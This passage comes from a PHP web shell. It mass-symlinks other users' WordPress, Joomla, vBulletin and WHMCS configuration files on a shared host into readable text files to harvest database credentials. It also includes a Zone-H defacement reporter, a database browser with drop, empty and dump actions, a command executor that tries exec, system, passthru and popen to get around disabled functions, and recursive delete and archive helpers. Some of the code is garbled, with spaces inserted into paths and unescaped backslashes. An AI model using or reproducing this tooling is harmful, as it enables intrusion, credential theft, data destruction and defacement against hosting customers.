 213       symlink(' / home / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 214       symlink(' / home / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 215       symlink(' / home / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 216       symlink(' / home / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 217       symlink(' / home / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 218       symlink(' / home / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 219       symlink(' / home / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 220       symlink(' / home / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 221       symlink(' / home / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 222       symlink(' / home / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 223       symlink(' / home / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 224       symlink(' / home / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 225       symlink(' / home / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 226       symlink(' / home2 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 227       symlink(' / home2 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 228       symlink(' / home2 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 229       symlink(' / home2 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 230       symlink(' / home2 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 231       symlink(' / home2 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 232       symlink(' / home2 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 233       symlink(' / home2 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 234       symlink(' / home2 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 235       symlink(' / home2 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 236       symlink(' / home2 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 237       symlink(' / home2 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 238       symlink(' / home2 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 239       symlink(' / home2 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 240       symlink(' / home2 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 241       symlink(' / home2 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 242       symlink(' / home2 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 243       symlink(' / home2 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 244       symlink(' / home2 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 245       symlink(' / home2 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 246       symlink(' / home2 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 247       symlink(' / home2 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 248       symlink(' / home2 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 249       symlink(' / home2 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 250       symlink(' / home2 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 251       symlink(' / home2 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 252       symlink(' / home2 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 253       symlink(' / home2 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 254       symlink(' / home2 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 255       symlink(' / home2 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 256       symlink(' / home3 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 257       symlink(' / home3 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 258       symlink(' / home3 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 259       symlink(' / home3 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 260       symlink(' / home3 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 261       symlink(' / home3 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 262       symlink(' / home3 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 263       symlink(' / home3 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 264       symlink(' / home3 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 265       symlink(' / home3 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 266       symlink(' / home3 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 267       symlink(' / home3 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 268       symlink(' / home3 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 269       symlink(' / home3 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 270       symlink(' / home3 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 271       symlink(' / home3 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 272       symlink(' / home3 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 273       symlink(' / home3 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 274       symlink(' / home3 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 275       symlink(' / home3 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 276       symlink(' / home3 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 277       symlink(' / home3 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 278       symlink(' / home3 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 279       symlink(' / home3 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 280       symlink(' / home3 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 281       symlink(' / home3 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 282       symlink(' / home3 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 283       symlink(' / home3 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 284       symlink(' / home3 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 285       symlink(' / home3 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 286       symlink(' / home4 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 287       symlink(' / home4 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 288       symlink(' / home4 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 289       symlink(' / home4 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 290       symlink(' / home4 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 291       symlink(' / home4 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 292       symlink(' / home4 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 293       symlink(' / home4 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 294       symlink(' / home4 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 295       symlink(' / home4 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 296       symlink(' / home4 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 297       symlink(' / home4 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 298       symlink(' / home4 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 299       symlink(' / home4 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 300       symlink(' / home4 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 301       symlink(' / home4 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 302       symlink(' / home4 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 303       symlink(' / home4 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 304       symlink(' / home4 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 305       symlink(' / home4 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 306       symlink(' / home4 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 307       symlink(' / home4 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 308       symlink(' / home4 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 309       symlink(' / home4 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 310       symlink(' / home4 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 311       symlink(' / home4 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 312       symlink(' / home4 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 313       symlink(' / home4 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 314       symlink(' / home4 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 315       symlink(' / home4 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 316       symlink(' / home5 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 317       symlink(' / home5 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 318       symlink(' / home5 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 319       symlink(' / home5 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 320       symlink(' / home5 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 321       symlink(' / home5 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 322       symlink(' / home5 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 323       symlink(' / home5 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 324       symlink(' / home5 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 325       symlink(' / home5 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 326       symlink(' / home5 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 327       symlink(' / home5 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 328       symlink(' / home5 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 329       symlink(' / home5 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 330       symlink(' / home5 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 331       symlink(' / home5 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 332       symlink(' / home5 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 333       symlink(' / home5 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 334       symlink(' / home5 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 335       symlink(' / home5 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 336       symlink(' / home5 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 337       symlink(' / home5 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 338       symlink(' / home5 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 339       symlink(' / home5 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 340       symlink(' / home5 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 341       symlink(' / home5 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 342       symlink(' / home5 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 343       symlink(' / home5 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 344       symlink(' / home5 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 345       symlink(' / home5 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 346       symlink(' / home6 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 347       symlink(' / home6 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 348       symlink(' / home6 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 349       symlink(' / home6 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 350       symlink(' / home6 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 351       symlink(' / home6 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 352       symlink(' / home6 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 353       symlink(' / home6 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 354       symlink(' / home6 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 355       symlink(' / home6 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 356       symlink(' / home6 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 357       symlink(' / home6 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 358       symlink(' / home6 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 359       symlink(' / home6 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 360       symlink(' / home6 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 361       symlink(' / home6 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 362       symlink(' / home6 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 363       symlink(' / home6 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 364       symlink(' / home6 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 365       symlink(' / home6 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 366       symlink(' / home6 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 367       symlink(' / home6 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 368       symlink(' / home6 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 369       symlink(' / home6 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 370       symlink(' / home6 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 371       symlink(' / home6 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 372       symlink(' / home6 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 373       symlink(' / home6 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 374       symlink(' / home6 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 375       symlink(' / home6 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 376       symlink(' / home7 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 377       symlink(' / home7 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 378       symlink(' / home7 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 379       symlink(' / home7 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 380       symlink(' / home7 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 381       symlink(' / home7 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 382       symlink(' / home7 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 383       symlink(' / home7 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 384       symlink(' / home7 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 385       symlink(' / home7 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 386       symlink(' / home7 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 387       symlink(' / home7 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 388       symlink(' / home7 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 389       symlink(' / home7 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 390       symlink(' / home7 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 391       symlink(' / home7 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 392       symlink(' / home7 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 393       symlink(' / home7 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 394       symlink(' / home7 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 395       symlink(' / home7 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 396       symlink(' / home7 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 397       symlink(' / home7 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 398       symlink(' / home7 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 399       symlink(' / home7 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 400       symlink(' / home7 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 401       symlink(' / home7 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 402       symlink(' / home7 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 403       symlink(' / home7 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 404       symlink(' / home7 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 405       symlink(' / home7 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 406   }
 407       
 408   // Zone-h Poster
 409   function ZoneH($url, $hacker, $hackmode,$reson, $site )
 410   {
 411       $k = curl_init();
 412       curl_setopt($k, CURLOPT_URL, $url);
 413       curl_setopt($k,CURLOPT_POST,true);
 414       curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
 415       curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
 416       curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
 417       $kubra = curl_exec($k);
 418       curl_close($k);
 419       return $kubra;
 420   }
 421   
 422   // Database functions
 423   function listdatabase()
 424   {   
 425       $self=$_SERVER["PHP_SELF"];
 426       ?>
 427       <br>
 428       <form>
 429       <input type="hidden" name="action" value="createDB">
 430           <table>
 431           <tr>
 432               <td><input type="text" class="box" name="dbname"></td><td><input type="submit" value="  Create Database  " name="createmydb" class="but"></td>
 433           </tr>
 434           </table>
 435       </form>
 436           <br>
 437       <?php 
 438       $mysqlHandle = mysql_connect ($_COOKIE['dbserver'], $_COOKIE['dbuser'], $_COOKIE['dbpass']);
 439       $result = mysql_query("SHOW DATABASE"); 
 440       echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>
 441 ";
 442 
 443       $pDB = mysql_list_dbs( $mysqlHandle );
 444       $num = mysql_num_rows( $pDB );
 445       for( $i = 0; $i < $num; $i++ ) 
 446       {
 447           $dbname = mysql_dbname( $pDB, $i );
 448           mysql_select_db($dbname,$mysqlHandle);
 449           $result = mysql_query("SHOW TABLES"); 
 450           $num_of_tables = mysql_num_rows($result);
 451           echo "<tr>
 452 ";
 453           echo "<td><a href='$self ? action = listTables & dbname = $dbname'><font color=red size=3>$dbname</font></a> ($num_of_tables)</td>
 454 ";
 455           echo "<td><a href='$self ? action = listTables & dbname = $dbname'>Tables</a></td>
 456 ";
 457           echo "<td><a href='$self ? action = dropDB & dbname = $dbname & executequery' onClick=\"return confirm('DropDatabase\'$dbname\'?') \">Drop</a></td>
 458 ";
 459         echo "<td><a href='$self?action=dumpDB&dbname=$dbname' onClick=\"return confirm('Dump Database \'$dbname\'?')\">Dump</a></td>
 460 ";
 461         echo "</tr>
 462 ";
 463     }
 464     echo "</table>
 465 ";
 466     mysql_close($mysqlHandle);
 467 }
 468 function listtable() {
 469     $self = $_SERVER["PHP_SELF"];
 470     $dbserver = $_COOKIE["dbserver"];
 471     $dbuser = $_COOKIE["dbuser"];
 472     $dbpass = $_COOKIE["dbpass"];
 473     $dbname = $_GET['dbname'];
 474     echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
 475 ?>
 476        <br><br>
 477        <form>
 478        <input type="hidden" name="action" value="createtable">
 479        <input type="hidden" name="dbname" value="<?php echo $_GET['dbname']; ?>">
 480            <table>
 481            <tr>
 482                <td><input type="text" class="box" name="tablename"></td><td><input type="submit" value="  Create Table  " name="createmydb" class="but"></td>
 483            </tr>
 484            </table>
 485        
 486            <br>
 487            <form>
 488            <input type="hidden" value="<?php echo $_GET['dbname']; ?>" name="dbname">
 489            <input type="hidden" value="<?php echo $_GET['tablename']; ?>" name="tablename">
 490            <input type="hidden" value="executequery" name="action">
 491            <table>
 492                <tr>
 493                    <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
 494                </tr>
 495                <tr>
 496                    <td><input type="submit" value="Execute" class="but"></td>
 497                </tr>
 498            </table>
 499            </form>
 500            
 501        <?php
 502     $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
 503     mysql_select_db($dbname);
 504     $pTable = mysql_list_tables($dbname);
 505     if ($pTable == 0) {
 506         $msg = mysql_error();
 507         echo "<h3>Error : $msg</h3><p>
 508 ";
 509         return;
 510     }
 511     $num = mysql_num_rows($pTable);
 512     echo "<table cellspacing=1 cellpadding=5 border=1 style=width:60%;>
 513 ";
 514     for ($i = 0;$i < $num;$i++) {
 515         $tablename = mysql_tablename($pTable, $i);
 516         $result = mysql_query("select * from $tablename");
 517         $num_rows = mysql_num_rows($result);
 518         echo "<tr>
 519 ";
 520         echo "<td>
 521 ";
 522         echo "<a href='$self?action=viewdata&dbname=$dbname&tablename=$tablename'><font color=red size=3>$tablename</font></a> ($num_rows)
 523 ";
 524         echo "</td>
 525 ";
 526         echo "<td>
 527 ";
 528         echo "<a href='$self?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>
 529 ";
 530         echo "</td>
 531 ";
 532         echo "<td>
 533 ";
 534         echo "<a href='$self?action=viewdata&dbname=$dbname&tablename=$tablename'>Data</a>
 535 ";
 536         echo "</td>
 537 ";
 538         echo "<td>
 539 ";
 540         echo "<a href='$self?action=empty&dbname=$dbname&tablename=$tablename'>Empty</a>
 541 ";
 542         echo "</td>
 543 ";
 544         echo "<td>
 545 ";
 546         echo "<a href='$self?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>
 547 ";
 548         echo "</td>
 549 ";
 550         echo "</tr>
 551 ";
 552     }
 553     echo "</table></form>";
 554     mysql_close($mysqlHandle);
 555     echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> &nbsp; <a href=$self?logoutdb> <font color=red size=3>[ Log Out ]</font> </a></div>";
 556 }
 557 function paramexe($n, $v) {
 558     $v = trim($v);
 559     if ($v) {
 560         echo '<span><font color=red size=3>' . $n . ': </font></span>';
 561         if (strpos($v, "
 562 ") === false) echo '<font color=red size=2>' . $v . '</font><br>';
 563         else echo '<pre class=ml1><font color=lime size=3>' . $v . '</font></pre>';
 564     }
 565 }
 566 $dir = getcwd();
 567 if (isset($_GET['dir'])) {
 568     $dir = $_GET['dir'];
 569 }
 570 function dis() {
 571     if (!ini_get('disable_functions')) {
 572         echo "None";
 573     } else {
 574         echo @ini_get('disable_functions');
 575     }
 576 }
 577 function mycmdexec($cmd) {
 578     global $disablefunc;
 579     $result = "";
 580     if (!empty($cmd)) {
 581         if (is_callable("exec") and !in_array("exec", $disablefunc)) {
 582             exec($cmd, $result);
 583             $result = join("
 584 ", $result);
 585         } elseif (($result = "$cmd") !== FALSE) {
 586         } elseif (is_callable("system") and !in_array("system", $disablefunc)) {
 587             $v = @ob_get_contents();
 588             @ob_clean();
 589             system($cmd);
 590             $result = @ob_get_contents();
 591             @ob_clean();
 592             echo $v;
 593         } elseif (is_callable("passthru") and !in_array("passthru", $disablefunc)) {
 594             $v = @ob_get_contents();
 595             @ob_clean();
 596             passthru($cmd);
 597             $result = @ob_get_contents();
 598             @ob_clean();
 599             echo $v;
 600         } elseif (is_resource($fp = popen($cmd, "r"))) {
 601             $result = "";
 602             while (!feof($fp)) {
 603                 $result.= fread($fp, 1024);
 604             }
 605             pclose($fp);
 606         }
 607     }
 608     return $result;
 609 }
 610 function rrmdir($dir) {
 611     if (is_dir($dir)) // ensures that we actually have a directory
 612     {
 613         $objects = scandir($dir); // gets all files and folders inside
 614         foreach ($objects as $object) {
 615             if ($object != '.' && $object != '..') {
 616                 if (is_dir($dir . '/' . $object)) {
 617                     // if we find a directory, do a recursive call
 618                     rrmdir($dir . '/' . $object);
 619                 } else {
 620                     // if we find a file, simply delete it
 621                     unlink($dir . '/' . $object);
 622                 }
 623             }
 624         }
 625         // the original directory is now empty, so delete it
 626         rmdir($dir);
 627     }
 628 }
 629 function godir($dir) {
 630     //echo $dir;
 631     $zip = new ZipArchive();
 632     $filename = basename($dir) . '.zip';
 633     // open archive
 634     if ($zip->open($filename, ZIPARCHIVE::CREATE) !== TRUE) {
 635         die("Could not open archive");
 636     } else echo "fdg";
 637     if (is_dir($dir)) // ensures that we actually have a directory
 638     {
 639         $objects = scandir($dir); // gets all files and folders inside
 640         foreach ($objects as $object) {
 641             if ($object != '.' && $object != '..') {
 642                 if (is_dir($dir . '\' . $object))
 643                   {//echo $dir . ' / ' . $object;
 644                       // if we find a directory, do a recursive call
 645                       godir($dir . '\' . $object);
 646                   }
 647                   else
 648                   {
 649                       // if we find a file, simply add it
 650                       $zip->addFile($dir . '\' . $object) or die ("ERROR: Could not add file: $key");
 651                   }
 652               }
 653           }
 654           // the original directory is now empty, so delete it
 655           $zip->addFile($dir) or die ("ERROR: Could not add file: $key");
 656       }       
 657   } 
 658   
 659   
 660               
 661   function which($pr)
 662   { 
 663       $path = execmd("which $pr"); 
 664       if(!empty($path)) 
 665           return trim($path); 
 666       else 
 667           return trim($pr); 
 668   }
 669   
 670   function cf($f,$t) 
 671   { 
 672         $w=@fopen($f,"w") or @function_exists('file_put_contents'); 
 673         if($w)
 674       { 
